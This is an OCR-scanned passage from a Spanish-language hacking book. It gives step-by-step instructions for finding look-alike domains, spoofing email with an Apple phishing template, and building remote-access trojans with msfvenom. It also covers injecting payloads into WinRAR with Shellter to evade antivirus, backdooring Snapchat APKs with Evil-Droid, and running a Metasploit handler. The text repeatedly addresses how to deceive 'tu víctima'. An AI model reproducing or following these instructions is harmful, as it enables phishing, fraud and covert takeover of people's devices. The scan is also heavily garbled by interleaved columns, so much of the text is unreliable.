muestre cada dominio que se parezca al original 


que intentamos atacar, y si está o no utilizado. 
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Para esto, nos iremos al directorio en nuestro 
sistema de dnstwist escribiendo cd 
/opt/Reconocimiento/dnstwist, y ejecutaremos el 
| script seguido del dominio que queremos encontrar 
uno similar, por ejemplo, de Facebook seria algo 


| asi: 


./dnstwist.py facebook.com. 


:/# Cd /opt/Reconocimiento/dnstwist/ 
:/opt/Reconocimiento/dnstwist+* ls 


base dictionaries dnstwist.py Dockerfile docs README.md 
:/Opt/Reconocimiento/dnstwist* ./dnstwist. py facebook. compl 





Seguido de esto, empezará a buscar todas las 


alternativas, y si están siendo utilizadas. 
A e he 
END A 
ee Nal ANNE 

/ 


ac Nef RAS Pele \__| {1.04b} 





Processing 284 domain variants 





Luego de unos segundos, podrás ver todas las 





alternativas, si tienen un registro a la derecha, 
significa que alguien está utilizando ese dominio, si 


no, podría estar disponible. 
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facebo. ok. com 

faceboo. k. com 

afcebook. com 103, 224.182.245 1 sl above .com My park mx 
fcaebook. com 31,13.70.1 2a03: 2880: o Ji ae b00c:0:1 | 
faecbook. com 103.224.182.245 NS:ns1.above.com MX: park-m Ay 
facbeook. com 103,224, 182,245 NS:nsl.above.com M ey 
faceobok, com SIE 2003: 2880: f00d: 1: et oe: 0: 11 
faceboko. com 185.53,179,29 NS: flginsl.dnspod 

facibook, com 185,53,178,22 NS:nsl.pa crew. n 
facobook. com 199.191.50.73 T EA 
faceboek. com 199,59,242,151 NS:ns1.bodis,com MX 


Instalación 


Si te falla al correrlo, probablemente te falto algún 
paso en la instalación (luego de haberlo 
descargado y estar en su dirección en la terminal) 
requieres primero darle permisos al script con el 
comando chmod +x dnstwist.py, y luego escribir 
pip install -r requirements.txt. 


Linux 


Ubuntu Linux is the primary development platform. If running Ubuntu 15.04 or newer, you can install dependencies lies 


$ sudo apt-get install python-dnspython python-geoip python-uhois Y 
python-requests python-ssdeep python-cffi 


Alternately, you can use Python tooling, This can be done within a virtual environment to avoid conflicts with other 


installations. However, you will still need a couple of libraries installed at the system level, 


$ sudo apt-get install libgeoip-dev libffi-dey 
$ BUILD LIB=1 pip install -r requirements.txt 
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Email Spoofing 


Ahora que ya sabes como crear paginas web falsas 
para robar credenciales por medio de phishing, 
sigue pensar en una forma de convencer a la 
victima de que abra esa pagina. 

Existen muchas formas en las que se podria hacer 
esto, como ingenieria social por redes sociales, 
pero uno de los métodos mas efectivos hasta hoy, 
es utilizar el correo electrónico, sin embargo, si 
envías un correo de facebookcuen45@gmail.com, 
probablemente o te marcarán como “spam”, o 
simplemente no te creerán, especialmente en 
ambientes corporativos. 

Lo que sugiero, es hacer lo que llamamos “email 
spoofing”, que es mandar un correo con el dominio 
de la víctima de forma que se crea que es el mismo 
correo. 

Para hacer esto, no necesitamos una herramienta 
dentro de Linux necesariamente, basta con utilizar 
alguna página web, puedes encontrar una 


herramienta desarrollada por nosotros en 
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whitesuithacking.com/material-libro en el botón Así, a la víctima le llegaría algo como esto: 


“email spoof”, pero hay varias otras alternativas 


ruebaapple 
también. pruebaapp 


a AN ! 
pablo <pablo@apple.com> « 


EMAILSPOOF 





= gmail.com> 
Luego de entrar, notaras algunos campos, en estos 


i ic i aapple 
pones la dirección desde donde quieres que llegue pruebaapp 
el correo electrónico, a quien se le mandara, y el 


contenido. Digamos que nuestra víctima es 


| 
usuario@gmail.com, y queremos mandarle un | wy Reply 


correo de Apple, digamos, de pablo@apple.com , 
escribiriamos algo similar a esto. 


Email Falso: pablo(M apple com 
NA usuario(A gmail.com 
Asunto: dc 


Spoof MSG: 








Sin embargo, cabe hacer notar que en el apartado 






de “contenido del correo” se acepta código HTML, 





así que vamos a llevarlo un paso más lejos. 





Para agregar modelos HTML para hacer el correo 
parecer legítimo, basta con pegar el código HTML 

N E ; en dicho apartado, por ejemplo, en la carpeta 

lopt/Explotacion/email templates agregue 


algunos modelos para que experimenten con este 





Enviar 


| ataque. 


306 307 


















7 


'opt/E 


plotac 
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F 
A f ~~ a 
A il 


if 
sf X 


En este caso, agregare un template de Apple para 
hacer creer a la victima que el correo viene de 
Apple, y que tiene que reestablecer su cuenta, el 
modelo se ve algo como esto, recuerda que es 


HTML, las ligas y los nombres adecuados deberas 


Dear Pablo Gutierrez. 
Your Apple ID (| * 
Date and Time: 24 April 2018, 9:08 AM PDT 
Browser: Chrome 


Operating System. Windows 


If the information above looks familiar, you can disregard this email. 


If you have not signed in to ¡Cloud recently and believe someone may have accessed your 
account, go to Apple ID (https //appleid apple com) and change your password as soon as 


possible. 


Sincerely. 


Apple Support 


Apple 10 : Support| Privacy Policy 


r aht (eh APSE ED A re sys Zim ô tari iau Cin mm SA Ll á cA 3 $ 5 = 
Copynaht S 2013 Appie inc One Appie Park Way, Cupertmo, CA 95014 USA Albrights reserved. 
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‘@gmail.com) was used to sign in to iCloud via a web brows 








WATE pel 


cambiarlos para que dirijan a tu víctima a una liga 







maliciosa en tu poder. 


Lo mandaríamos pegando el código modificado en la 








página para mandar correos. 


Email Falso: pablo@apple.com 
Email dela victima: iiai Gomaicom 







Asunto: 
Spoof MSG: 






<table class="m_1223344743394638175mainTable" align="center” style="margin:0 
auto;font-size:inherit;line-height:inherit;text-align:center;border- 
spacing:0;border-collapse:collapse;padding:0;border:0” cellpadding="0" 
cellspacing="0"> 

<thody><tro<td class="m_1223344743394638175topPadding" 
style="font-family: Lucida Grande’ ,Helvetica,Arial,sans-serif;height:16px" 
height="16"></td></tr> 

<tr> 
<td class="m_1223344743394633175centerColumn" 















onido del correo: 


Y finalmente, a la víctima le llegaría algo similar a 
lo siguiente, este solo es un ejemplo, en realidad 
podrías utilizar esta metodología para meter en las 
ligas de los correos ligas a descargas maliciosas, 
phishing, o incluso para engañar personas en una 


organización para que te den información sensible. 
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spablo@appie.com’ X 


Sgmal.cont + ePanaé.com> 


Dear Pablo Gutierrez, 
Your Apple ID ( (gmail.com) was used to sign in to ¡Cloud via a web browser 


Date and Time: 24 Apni 2018, 2:98 AM PDT 
Browser, Chrome 
Operating System. Windows 


if ihe information above looks famiilar, you can disregard this email 


fF you have nol signed In to iCioud recently and believe someone may have accessed your 
account, go to Apple 10 (https //appieid_apple.com) and change your passveord as soon as 
possible 


Sincerely. 


Apple Support 


=pablo@apple.com> x 


to: (gmail com” < Qgmail com> 


¿Como funciona este ataque”? 


Es muy sencillo, un correo electrónico no es muy 
diferente a correspondencia física, tiene 
“estampillas” de la misma forma, solo que en este 
caso es metadata, con modificar esta metadata, 
podemos hacer parecer como que el correo vino de 


otro lugar. 





i 


po. 
{ 
‘ 







a 








Por la forma en la que funciona, es solo de ida el 
correo, es decir, si alguien responde a 
pablo@apple.com, no recibiría esa respuesta. 
Adicionalmente, por la forma en la que funciona, 
sistemas básicos de detección de SPAM podrían 
detener el ataque, sin embargo, muchas 
organizaciones, particularmente las PyMES, no 
utilizan ningún sistema de seguridad en correos 
electrónicos, por lo cual sigue siendo una manera 
de ataque bastante efectiva. 

Si existen filtros, una alternativa es crear un correo 


electrónico con un dominio similar comprado. 


¿A quién le mandamos un correo como este? 


En la etapa de reconocimiento una de las 
principales metas es conseguir correos 
electrónicos, esta es la razón, podríamos utilizar 
esta metodología para robo de identidad entre 
compañeros de trabajo, de forma que uno de ellos 


abra algún archivo o liga malicioso/a. 
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Metasploit 


Metasploit es una de las grandes herramientas del 
pentesting, es de las más útiles y utilizadas en el 
area. Es desarrollada y mantenida por Rapid7, y 
está escrita en Ruby, esta herramienta nos sirve 
para realizar la explotación y post explotación a 
casi cualquier sistema, por ejemplo, con esta 
herramienta podríamos entrar a un sistema 
vulnerable a Eternalblue, o podríamos crear un 
malware para Android y obtener acceso remoto al 
dispositivo al ser abierto por la víctima, en pocas 
palabras, esta es una de las herramientas que 


tienes que dominar si te interesa la ciberseguridad. 
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Estructura de la herramienta 


Antes de poder utilizarla, debes entender como 
está estructurada. Metasploit esta compuesta de lo 
que llamamos módulos, y cada módulo tiene una 
función en particular, sus principales módulos son: 
- Exploit 
Este módulo es utilizado para explotación de 
vulnerabilidades (CVEs, generalmente), lo 
utilizaras cuando detectes una vulnerabilidad 
en un sistema. 
- Post 
Este módulo se refiere a post-explotación, 
tiene funciones para realizar tareas en 
dispositivos a los que ya tienes control. 
Únicamente te sirve si ya tienes acceso a un 
sistema, no antes. 
- Payload 
Este modulo te sirve para crear payloads, 
que, en este contexto, es codigo malicioso 
con alguna función, típicamente acceso 


remoto, con este módulo podrías crear un 
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troyano para acceder remotamente a un 
Android, Windows, o incluso servidores 
usando lenguajes como PHP, Ruby, Python, 
etc. 

- Auxiliary 
Este módulo es utilizado para una variedad 
de ataques, desde DDOS, hasta 
reconocimiento o análisis de 
vulnerabilidades. 

- Encoder 
Finalmente, el módulo encoder se utiliza 
para codificar los payloads para evadir 
antivirus, anteriormente era útil, pero hoy en 
día este módulo es obsoleto, así que no lo 


utilizaremos. 








auxiliary encoders exploits payloads 


Prácticamente siempre que utilices Metasploit 


estarás en, o requerirás uno de estos módulos, pon 
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atención a que quieres hacer y para qué sirve cada 
módulo al utilizarlo. 

Dentro de los módulos existen lo que llamaremos 
scripts, que se refiere a la utilidad o función en sí 


de Metasploit que utilizaremos. 


Palabras reservadas 


Metasploit tiene lo que llamamos “palabras 
reservadas”, que nos sirven para Una tarea en 
particular mientras que la herramienta este 
corriendo, ahora, estas palabras solo funcionan 
cuando Metasploit está corriendo, antes de iniciar 
la herramienta no funcionaran. 

- Msfconsole 
Esta es la palabra que, si escribes en la terminal, 
iniciara Metasploit. 

- Search 
Esta palabra reservada se utiliza para buscar 
scripts en módulos dentro de la herramienta, es 
muy útil hasta que te sepas todas las rutas de 
memoria, por ejemplo, si buscas los payloads 


disponibles para Android, podrías escribir search 
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payload/android/ y te mostraria las opciones que 
tienes. 

- Use 
Esta palabra es la que utilizaras siempre antes de 
iniciar algun script, por ejemplo, digamos que 
requieres lanzar un script del módulo exploit con la 
ruta exploit/multi/handler, para utilizarlo en 
Metasploit, tendrías que escribir use 
exploit/multi/handler. 

- Set 
Dentro de Metasploit muchos de los scripts tienen 
variables que necesitan ser configuradas, por 
ejemplo, si vas a lanzar un ataque, generalmente 
hablando Metasploit no sabe a qué IP vas a atacar, 
utilizaras la palabra set para configurar las 
variables. Por ejemplo, digamos que tienes que 
configurar la IP, y la variable de esta es LHOST, 
asumiendo que tu IP es 192.168.1.16, para 
configurar esto escribirías set LHOST 
192.168.1.16. 
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- show options 
Antes de configurar las variables, debes saber 
cuales son estas, para saber esto puedes escribir 
show options y te mostrara las variables y 
configuraciones posibles en un script. 

- Help 
En casi todos lados de la herramienta, si escribes h 
o help te aparecerá un menú con ayuda O 
comandos disponibles. 

- Exploit/run 
Estas palabras son las que utilizaras para ejecutar 
un script o algún comando, por ejemplo, si tienes 
configurado un ataque y ya está listo para lanzarse, 


el comando de lanzamiento seria exploit. 
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Armitage 


Metasploit en si es una herramienta que corre en la 
terminal, sin embargo, tiene una modalidad con 
interfaz grafica, que se llama Armitage. Armitage 
tiene exactamente las mismas funciones que 
Metasploit, sin embargo, tiene unas cuentas 
ventajas, la primera y mas obvia es que siendo 
interfaz grafica, es mas facil de usar para la 
mayoria de las personas, y la segunda muy 
importante, es que tiene integración con otras 
herramientas tales como nmap con lo que puedes 
realizar escaneos y análisis de vulnerabilidades en 
una sola consola. 

Sin embargo, existen algunas desventajas claves, 
la primera es que, al ser un ambiente gráfico, no 
siempre vas a tener acceso a este, y consume 
considerablemente más recursos que Metasploit, 
adicionalmente, en mi experiencia personal he 
encontrado algunos bugs, que si no sabes cómo 
funciona la herramienta para resolver estos, podría 


echarte a perder un proyecto fácilmente. 
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Sin embargo, su facilidad de uso y ambiente grafico 


no dejan de ser muy útiles en muchas situaciones, 


así que es algo que recomiendo estudiar. 
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Armitage 

















Troyanos para acceso remoto 


En esta sección crearas troyanos o RATs para 
diferentes tipos de sistemas, primero te explicare 
los fundamentos de cómo funciona un RAT, luego 
te ensenare a crear varios tipos de RATs, y 
finalmente, te ensenare a controlar el RAT con 
Metasploit, al terminar los ejemplos con Metasploit, 
veremos cómo crear RATs con otras herramientas. 
Un troyano para acceso remoto, también llamados 
RAT (Remote Access Troyan), es código malicioso 
disfrazado de alguna aplicación que la víctima 
abriría o instalaría, pero ejecuta silenciosamente su 
código malicioso, dándote acceso remoto al 
sistema. 

El fundamento de cómo funciona esto es bastante 


sencillo, está compuesto de dos partes: 


1. El RAT 


El RAT es el archivo malicioso que se espera que 


la víctima ejecute, piensa en ello como un “espía 
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encubierto” intentándose infiltrar a una 
organización, necesita al momento de ser creado, 
dos cosas, una IP, que podemos llamarle la 
“nodriza” (a donde se comunica una vez 
ejecutado), y un puerto, que es al puerto donde se 
le va a estar escuchando, esta IP y este puerto, es 
la del atacante, no la de la víctima. Piénsalo de 
esta forma, un espía ruso se infiltra en el FBI 
encubierto, una vez establecido, debe de 
comunicarse con Rusia por medio de cartas para 
recibir instrucciones, la carta debe de tener dos 
cosas, la dirección de KGB en Rusia, y el nombre 
de su jefe, esas dos cosas son el equivalente a la 


IP y el puerto. 


2. El escuchador, o manejador (handler) 


El escuchador, o handler, es el servicio en el 
sistema del atacante que va a recibir las 
conexiones, y contestar con comandos sobre qué 
debe hacer el RAT que está en el sistema externo, 


si este no está habilitado en el momento en el que 
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se reciben las conexiones, el RAT no tendrá 
ordenes, y por lo tanto, no hará nada. 

Piensa en esto como el “jefe” del espía en el 
ejemplo anterior, el espía puede mandar una carta 
a la KGB y a su jefe, pero si el jefe está de 
vacaciones y no responde con instrucciones, el 


espía simplemente se quedara sin hacer nada. 


Así es como funcionan todos los RATs, si alguna 
vez vas a realizar un ataque por medio de RAT, 
tienes que preguntarte como y donde vas a 
configurar estas dos cosas. 

Otra cosa, naturalmente, tienes que tener acceso a 
una IP publica de forma que las “cartas” (en el caso 
real serian paquetes) puedan llegar a tu 


controlador. 
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Metasploit 


Metasploit es una de las herramientas más 
utilizadas para explotar sistemas, así que 
aprenderemos primero como crear malware 
utilizando el módulo de payload de Metasploit, para 
luego aprender a controlar dicho malware y 


sistema. 


Msftvenom 


Msfvenom es una de las herramientas dentro de 
Metasploit, esta te permite crear malware, 
esencialmente basándose en el módulo de 
payloads, puede crear RATs para casi toda 
tecnología que hay, ya que Metasploit tiene para 
todos los sistemas operativos y casi todos los 
lenguajes más comúnmente utilizados. 


Para utilizarlo, en la terminal debes de escribir el 


comando, para el cual la estructura es msfvenom - 
p <ruta del payload> LHOST=<tu IP> 
LPORT=<tu Puerto> > 


/ruta/nombredelarchivo.terminacion 
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Por ejemplo, si quisiéramos crear un malware para la herramienta Metasploit y usar la palabra 


Android, el comando seria el siguiente: reservada search para encontrar la ruta. 


msfvenom -p android/meterpreter/reverse_tcp 
LHOST=192.168.1.67 LPORT=443 > | módulo payload, solo lo que sigue, porque el | 
| parametro -p ya esta diciéndole eso a la 


Recuerda que en msfvenom no escribimos el 


Iroot/Desktop/malware.apk 


Luego de presionar enter, debería de aparecer algo herramienta (seria redundante y daría un error). 


similar a lo siguiente, y el archivo en la ruta donde 






Evasión de antivirus (Windows) 


lo guardaste. E 
"JÆ msfvenom -p android/meterpreter/reverse tcp LHOST=192,168,1,67 se /root/Desktop/maly; 

[-] No platform was selected, choosing Msf::Module: :Platform: :Androld from the payloac | 

[-] No arch selected, selecting arch: datvik from the payload A pesar de que a ae as shed m 


No encoder or badchars specified, outputting raw payload 


Payload size; 10089 bytes i general, los payloads que crea para Windows en 





particular son tan conocidos que cualquier 





Ese es un malware para Android, y si 
1 ti antivirus, incluyendo Windows defender los 
i andler , 
alguien lo ejecuta, y tú tienes un h 
escuchando, obtendrías acceso remoto a EE, 


ese dispositivo, de la misma forma funciona 7 ap 


detecta, entonces evitaremos utilizar msfvenom por 
sí solo, e incluso los encoders de Metasploit, ya 
que también son inefectivos hoy en día. 


para todas las plataformas. 
Sin embargo, podemos utilizar otras herramientas 


Donde encontrar más payloads para evadir los antivirus, existen varias opciones 
como TheFatRat, Veil Shellter, que pueden infectar 

Si no sabes dónde encontrar algún payload o archivos ejecutables en Windows con malware 

malware para alguna tecnología, basta con iniciar procesado de forma que es menos detectable por 


324 325 








antivirus, y manteniendo la funcionalidad original 
del ejecutable, para evitar sospechas. 

Para probar estos malwares, sugiero probarlos en 
el laboratorio que hiciste, como en una maquina 
Windows 7. 


Práctica 


Shellter es una de las herramientas más efectivas 
para crear ejecutables para Windows que evaden 
antivirus, para leer o descargar dicha herramienta, 
ve a https://shellterproject.com , es un ejecutable 
para Windows, sin embargo, es portable a Linux 
utilizando Wine. 

Nota que este software, aunque en su versión 
gratis es decente, tiene algunas limitantes, entre 
ellas tamaño de ejecutable que podemos infectar, y 
nivel de evasión de antivirus, la versión de paga es 
mucho más poderosa, y bastante barata, pero solo 
está a la venta para empresas de seguridad e 
investigadores en seguridad informática. 

En nuestro caso, ya lo tenemos descargado en la 


máquina que descargaste en la página de 


326 





WHITE q 
ON l| E 
H A € Pe 
o k P- 








WhiteSuit Hacking, así que, para ejecutar la 
herramienta, deberás ir a la dirección 
lusr/share/shellter, y una vez ahi, escribir wine 
shellter.exe, la primera vez que lo ejecutes se 


configurara dentro de Wine, solo espera unos 


segundos y se abrirá la herramienta. 


‘/# ca /usr/share/shellter/ 


./USr/share/shellter# wine shellter. eye 





Una vez en dicha pantalla, tendras que ir eligiendo 
opciones hasta que hayas creado el malware que 
buscas, en la primera pantalla te preguntara si 
quieres crear un malware de forma automatica o 
manual, selecciona automática escribiendo la letra 
a y presionando enter, en todo momento tienes la 
opción de escribir la letra H, que se refiere a “help” 
O ayuda, y te dará una explicación de que hace 


cada opción. 
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Choose Operation Mode - Auto/Manual (A/M/H): ij 





















re err 





y - — 
1010101 01 10 0100110 10 01 11001001 0011101 001001 -/# CO /opt/Explotacion/Exes/ 
11 10 01 00 01 10 i 19 ;/opt/Explotacion/Exes# ls 
Qu ALIÓ et i vy ps tty.exe winrar.exe 

11 op A eas: 
0010010 11 00 0011010 100111 000111 00 110001101 10, : /opt/Explotacion/Exes# 
www. ShellterProject, com Wine Mode Luego de seleccionar el ejecutable, la herramienta 








hará un poco de procesamiento que tarda de 30 a 
60 segundos generalmente hablando, al terminar el 
procesamiento, te preguntará si quieres que el 


archivo tenga habilitado o no “stealth mode” que 





Luego, te pedirá la ruta del ejecutable al que se le ee aaa 
significa si quieres o no que se mantenga la 


va a inyectar código malicioso, nota que esto solo | el 
funcionalidad original del archivo al que estamos 


funciona para ejecutables para Windows. En este : 
infectando, seleccionaremos que sí. 





caso escribí la ruta del archivo WinRAR que 


descargue de la página oficial, ya que es al que voy Enable Stealth Mode? (Y/N/H ¡7 


q 





a inyectarle codigo malicioso. 


J 
PE Target: /var/www/htmL/winrar. ex 





Luego te preguntara si quieres utilizar un payload 
de la lista de payloads (que es la lista de payloads 


que usa msfvenom), o si quieres subir uno que tu 


En el sistema que tu descargaste, yo ya te pre- 


hayas creado, seleccionaremos que queremos usar 
descargue dos archivos ejecutables para que 
] | uno de la lista escribiendo L. 
practiques, que están en la ruta 
Una vez que seleccionaste que quieres usar uno 
lopt/Explotacion/Exes/ 
de la lista, deberas seleccionar cual, aunque todos 
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funcionan, yo sugiero utilizar la opción 1 que es El puerto no necesariamente tiene que ser el 443 
meterpreter_reverse_tcp. como yo lo puse, puede ser cualquier puerto que 

no esté siendo utilizado por otro servicio. 

3k OK 2K OK E EIA 
* meterpreter reverse tcp > 
AO e A O AO OK OK OF 


OK KOK ko KKK 


* Payloads * 
AK OOK FE ROOK OK OK OK OK 2K 2K OK 


MEtenpretertrevense [ele 
Meterpreter Reverse HTTP 
HESR KE ull] ets 


stager] 
stager] 
stager] 


SET EROUST: 192. 109.1. O7 





Shell Reverse TCP 
Shell Bind TCP 
WinExec 


stager] 
stager] 


[ 

l 

[ 
Meterpreter Bind TCP [stager] 

[ 

l 


SET LPORT: 443 


Al presionar enter, empezara a procesar, hasta que 





Us | ? y i 
A A (E/G7H): | te de la pantalla final donde al presionar enter, ya 


Select payload by index: 1 | habrás terminado de generar tu archivo infectado. 


No se genera un nuevo archivo con esta 





Ahora, ¿recuerdas lo que había mencionado que al herramienta, el archivo que tu seleccionaste al usar 


crear un malware se necesitan dos cosas? vamos la herramienta se infectó con código malicioso. 
a darle la información de estas dos cosas, la IP y el 

Puerto hacia dónde va a intentar conectarse al 

ejecutarse, recuerda que, si estás haciendo el 

ataque fuera de una red local, deberás usar aquí tu 


IP pública. 
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De nuevo, podriamos crear un malware de Android 


Injection: Verified! 


con msfvenom, sin embargo, vamos a llevarlo un 
paso mas elevado al infectar una aplicacion 


existente con nuestro malware, haciéndolo mucho 


Press [Enter] to continue... mas dificil de detectar. 


ing Vamos a utilizar una herramienta llamada 
De aqui solo queda que tu victima abra el 
evildroid, que en nuestro sistema se encuentra en 


ejecutable y tu obtendras acceso remoto a su 
la carpeta /opt/Explotacion/Evildroid, asi que 


sistema, notaras que el archivo generado se ve 

| H vamos a esa carpeta, y buscaremos el script “evil- 

y funciona igual que el archivo original. Ci i 

droid”, si no tiene permiso de ejecución, se lo 

- daremos con el comando chmod +x evil-droid. 

Infectando aplicaciones Android con malware A CO A LEE ee. 

‘/opt/Explotacion/evildroid# ls 

Android es el sistema operativo de dispositivos | at evil apl evil jr T icons README md tool 

a LCONS i TOOLS 


móviles más utilizado en el mundo, y, debido a lo :/opt/Explotac ‘on/evildrodi chmod +x evil-droid ff 


mucho que las personas utilizan y guardan 





informacion en el celular hoy en dia, es uno de los _ Ahora ejecutaremos el archivo escribiendo./evil- 


sistemas donde mas informacion podriamos droid e instalaremos todas las dependencias que 
obtener de poderlo explotar. nos solicite e iniciaremos los servicios de 
Esta practica sugiero realizarla en el emulador de 


Android Nox. 


Metasploit presionando yes en las ventanas 
emergentes. 
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3 ta herramienta hace su trabajo basándose en el 
% Evil-Droid Framework ® o ES j 


payload para Android de Metasploit, y tienes unas 


Execute framework and Services? cuantas opciones dependiendo de lo que busques 





hacer. 
JEFES | 1. APK MSF 
| No | Yes 
(ee Esta opcion crea un malware para Android, 
igual que msfvenom, realmente no hace 
Al iniciarse la herramienta, tendras un menu de nada mas, no lo recomiendo mas que para 
opciones. pruebas y practica de nivel basico. 


2. Backdoor APK Original (OLD) 
Esta opción infecta a una aplicación con 
código malicioso que te dará acceso remoto 
al dispositivo. Sin embargo, usa un método 
de infección más adecuado para 
aplicaciones que fueron creadas hace varios 
años y que no han sido actualizadas mucho, 
por ejemplo, videojuegos o aplicaciones de 
herramientas podrían ser infectadas por este 


método. 





334 335 

















WHITE SUIT 


e A Cc K | N G 


WHITE Su 


o H 2 


3. Backdoor APK Original (NEW) una aplicación decentemente moderna, Snapchat, 


Esta opción infecta a una aplicación con para esto, seleccionaremos la opción 3. 
código malicioso que te dará acceso remoto 
al dispositivo. Esta utiliza un método más 


adecuado para aplicaciones más modernas, 





[v] BACKDOOR APK ORIGINAL (NEW) 


como por ejemplo Snapchat. 





Al escribir 3 y presionar enter, nos pedirá los dos 











4. Bypass AV APK (ICON CHANGE) requisitos para crear malware, IP y Puerto, en 
No todas las aplicaciones pueden ser | forma de LHOST y LPORT, de nuevo, recuerda 
infectadas, así que una alternativa es que, si harás ataques globales, usa tu IP pública. 
cambiar el icono y evadir el sistema Nombra tu archivo como gustes, recuerda que tu 
antivirus, por ejemplo, si vas a pasar un víctima vera este nombre. 

i % SET LHOST & % SET LPORT 
WhatsApp Gold” con malware, y no puedes : is 9 
: e Your-Local-ip: O; Your-Public-i Eier example; 4444 
infectar el WhatsApp original, puedes ae = AS 
| 192.168,1.67 443 

simplemente cambiarle el icono al malware — = a 

| | Cancel [OK | | Cancel | OK 
que creaste con msfvenom. —— . SS 

5. Start Listener | * PAYLOAD NAME ® pS 
Empezar el escuchador, esta opción inicia el example: evilapk 
manejador para escuchar conexiones del | SnapChat | 
malware. Caral | OK | 

Cada opción es útil en diferentes situaciones, sin —_————_— ————_—_—_—_—_ 


embargo, para este ejemplo, vamos a inyectar a 
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Selecciona el Payload de Metasploit que utilizaras, 


en este caso yo sugiero 


android/meterpreter/reverse_tcp, pero aun así 


funcionan los demás. 


té EVIL-DROID & 


_ Chose payload option: 





Choose Option 


O)  android/shell/reverse_tcp 


a 


i. 


android/shell/reverse -http 


EA ry 
Ll JAN ie 
> $ ~ 5 


S 


android/shell/reverse_https 
android/meterpreter/reverse_tcp 


i 


android/meterpreter/reverse_http 


fr, PN penn, 
i) & J 10) 
ial eisai 


android/meterpreter/reverse_https 


no, 


ra pa 
i. awn 
SEN ae j 


mr 


android/meterpreter_reverse_tcp 


-_ 
o 


android/meterpreter_reverse_http 


o 


android/meterpreter_reverse_https 





—— A eem 
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| Cancel | ok 








—" ER 
Y finalmente selecciona la aplicación a la que va 


inyectar, en el sistema que descargaste ya pre- 


descargue algunas aplicaciones (no todas 


} t, 
funcionan con este método), entre ellas, Snapcha 


r 
que si funciona, sin embargo, puedes JANE 


| cualquier otra de apkpure.co 
















m u alguna otra fuente 


e intentarlo. 







TT = 
=P ed 
=> 5 


a + ae 








| 4 opt Explotacion evildroid $ 
Name 

E fb.apk 

= gboard.apk 

= netflix.apk 

note.apk 
snapchat.apk 

- snapchatviejo.apk 
= whatsapp.apk 
La primera vez que lo inicie 
presiona enter en todo, 





s te pedirá un 


cuestionario, simplemente 


hasta al final que te pregu 
ar: inyectando la 


nte que si ya terminaste, 


luego empezará a proces 


aplicación. 
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EEA a TRETE 3 donde vas a controlar al sistema de la víctima, esto 
te ahorraría algunos minutos de configuración al 


seleccionar “multi-Handler” 


9 EVIL-DROID OPTIONS % x) 


eb] Choose an option bellow: 


l 


¡Choose ( ption | 
Multi-Handler 

()  Attack-Vector 

$ Main-Menu 


05 Exit 


Cuando termine, te mostrará un mensaje de 







terminado, junto con la ubicación y nombre donde 


se guardó la aplicación infectada. 
& EVIL-DROID # 


BACKDOORED APK : /opt/Explotacion/evildroid/evilapk/ 
Libro.apk : 











a os 


OK 





l ¿Cómo funciona? 
De ahí basta con ingresar a esa ruta, y convencer a 


la víctima que instale dicha aplicación en su La teoría de cómo funciona este script es muy 


dispositivo, también te aparecerá una ventana sencillo, esencialmente, agarra dos aplicaciones, la 


preguntándote si quieres que te autoejecute el buena, que tu seleccionaste, y crea una “mala , 


escuchador, si la máquina en donde creaste el que es el payload de Metasploit, descompila 


archivo malicioso es el mismo que tiene la IP ambas, y lo que quedan son objetos llamados 


“smali”, manifest, que es donde se piden los 
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permisos, y el objeto/método principal, todo dividido ‘~/Desktop# ms fconsole 


en carpetas, entonces el script agarra el objeto de 
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Una vez abierto, estarás en lo que se conoce como 


la aplicación “mala” y la pega en la carpeta de la REN 
P y 1a PS3 P la consola de Metasploit, siempre que tengas en la 


buena”, modifica el código del objeto/metodo terminal msf > puedes asumir que estas en esta 


rincipal para que mande llamar al objeto “malo”, T? , 
PE A J y consola, si tienes algo después del msf, sigues en 


modifica el manifest para pedir más permisos, una i ; 
pura p p la consola, sin embargo, probablemente estás 


vez terminado eso, compila la aplicación (la buena . 
S i p p ( dentro de uno de los modulos. 


ahora infectada con el método “malo”), y la firma, y 


, 0,0,0,0,0,0,0.0,0- 
000 0000000 


listo, ahí tienes una aplicación con funcionalidad 
original, pero con una funcionalidad oculta que te 


da acceso remoto al sistema de la víctima. 


Controlando al sistema remotamente 


Ahora que ya creaste un programa malicioso que te 


dará acceso remoto (un RAT) al sistema que lo 
etasolo1t v4,1/,3-0dev ] 

ejecute, debes cumplir con el segundo requisito de 1795 exploits - 1019 auxiliary - 310 post | 
538 payloads - 41 encoders - 10 nops ] 
| 


Free Metasploit Pro trial: http://r-7.co/trymsp 


TE eT ee 


— i Oo 


un RAT, que es un manejador, también conocido | 





como handler, para hacer esto, abriremos | 

Metasploit. 

Para abrir Metasploit, escribe msfconsole en la Dentro de aqui es donde te sirven las palabras 
terminal. reservadas de Metasploit, en este momento ya 


creamos malwares, entonces nos interesa tener un 
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escuchador o handler, así que utilizaremos el 
comando use exploit/multi/handler para abrir el 
handler, nota la palabra reservada “use” y como 


cambia el módulo en la consola. 





sf > use exploit/multi/handler 
msf exploit( e 


Ahora, un handler tiene varias variables, la primera 
y más importante, es “¿qué voy a controlar?”, y 
esto se refiere a que PAYLOAD va a manejar, así 
que vamos a darle el comando set PAYLOAD 
<payload>, en este caso, si estamos controlando 
Windows, el payload fue 
/windows/meterpreter/reverse_tcp, así que el 
comando seria set PAYLOAD 
windows/meterpreter/reverse_tcp, asimismo, si 
fuéramos a controlar Android, seria set PAYLOAD 
android/meterpreter/reverse_tcp, cualquiera sea 
el caso, escribes el payload que hayas utilizado 


para crear tu archivo malicioso. 
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f exploit ( ) > set PAYLOAD windows/meterpreter/reverse tcp 
10AD => Windows/meterpreter/reverse tcp 


Luego, tienes que configurar las siguientes 
variables, para saber cuales son, basta con escribir 
la(s) palabra(s) reservadas show options. Aqui, 
veras en mayusculas las variables que tienes que 
darle a este handler, y si es requerido o no, en este 
caso es obvio, ya que vas a controlar un RAT, necesitas 
las dos cosas que siempre necesita un RAT, que son la 
IP (LHOST) y el Puerto (LPORT), nota que siempre que 
sea LPORT o LHOST significa que es la IP del 
atacante, cuando sea RPORT o RHOST es la IP de la 


víctima. 
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msf exploit ( ) > show options el servicio se corre localmente, aunque la conexión 


| , llegue a la IP pública. 
Module options (exploit/multi/handler): 


Luego de darle valor a las variables, podemos 
Name Current Setting Required Description | escribir show options de nuevo para confirmar 


que este adecuadamente configurado. 


exploit ( ye S60 nOs 192) 168).1.67 
Payload options (windows/meterpreter/reverse tcp): cT => 192,168.1.67 


‘ exploit ( ) > set LPORT 443 
Name Current Setting Required Description RT => 443 


Ee pa aie MR ee a ee ae = f exploit ( ) > show options 
EXTTFUNC Process Ex1t technique 


